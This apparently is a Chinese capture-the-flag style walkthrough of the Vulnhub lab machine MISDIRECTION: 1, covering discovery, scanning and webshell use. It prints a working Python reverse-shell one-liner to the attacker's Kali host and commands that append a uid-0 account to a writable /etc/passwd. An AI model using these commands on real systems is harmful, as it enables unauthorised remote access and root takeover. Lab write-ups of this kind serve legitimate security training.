Vulnhub-靶机-MISDIRECTION: 1

本篇文章仅用于技术交流学习和研究的目的，严禁使用文章中的技术用于非法目的和破坏，否则造成一切后果与发表本文章的作者无关

靶机下载之后使用仅主机模式加载到本地VMware Workstation工作站，需要发现目标靶机的IP地址，可以使用nmap，netdiscover，或者arp之类的工具 arp-scan 例如:sudo arp-scan -I eth1 -l 当然也是可以使用Windows环境下mac地址扫描工具都是可以的，那么本次演示就是arp-scan工具发现

地址:https://www.vulnhub.com/entry/misdirection-1,371/

这个靶机有点坑，我丢到virtual box里面死活获取不了IP地址，丢到VMware workstations里面是有仅主机模式也是死活获取不了IP地址，只有在VMware workstations环境下配置桥接模式才可以获取IP地址，我这里使用如下方法获取

netdiscover -r 10.0.0.0/8  因为我的桥接网段是10打头的，我刚开始使用10.0.32.0/24掩码确认是发现不了靶机的IP地址，之后只有通过全网段发现，最终发现局域网带VMware 标志，且mac地址符合的主机

目标靶机IP地址为：10.0.32.147

本机kali主机IP地址为：10.0.32.67

nmap扫描结果如下：

正常的使用dirb命令进行爆破目标80端口的目录，但是从显示结果来看是个巨坑，可能是带迷惑性的蜜罐，判断依据是扫除很多敏感目录，但是显示的大小都是50，这明显问题很大，看下面的过程

再看目标80端口是Python写的，越看越觉得像蜜罐，就不浪费时间在这上面，我们尝试扫描目标的8080端口试试

使用nikto扫描和目录爆破都扫出来了一个重要目录debug，我们先访问这个看看，然后再看看shell目录

最终直接获得一个webshell，通过此shell可以执行低权限的命令，将此webshell反弹到kali本地，因为在此webshell中执行不了su，sudo，vim等交互式命令

尝试nc和bash反弹shell不成功，于是使用Python进行反弹shell成功

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("10.0.32.67",9933));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

上述反弹成功时候使用sudo -u brexit切换到用户brexit，经过一番搜索，探索，发现/etc/passwd文件针对用户brexit有写的权限，既然这样，那么我们直接加用户，指定uid为0，root家目录，/bin/bash，具体操作如下：

openssl passwd -1  这里输入完成之后会交互式让你输入密码，然后就会生成加密的字符串，最终将其追加至/etc/passwd即可
还有另一种生成密码加密的字符串方式
openssl passwd -1 -salt bmfx bmfx  此命令将直接密码为bmfx的加密字符串，得到上述的加密字符串之后就可以开始追加账户密码到/etc/passwd

echo 'bmfx:$1$lMdMPIIr$A7vPnsv5JKk53goaJov9R.:0:0::/root:/bin/bash' >>/etc/passwd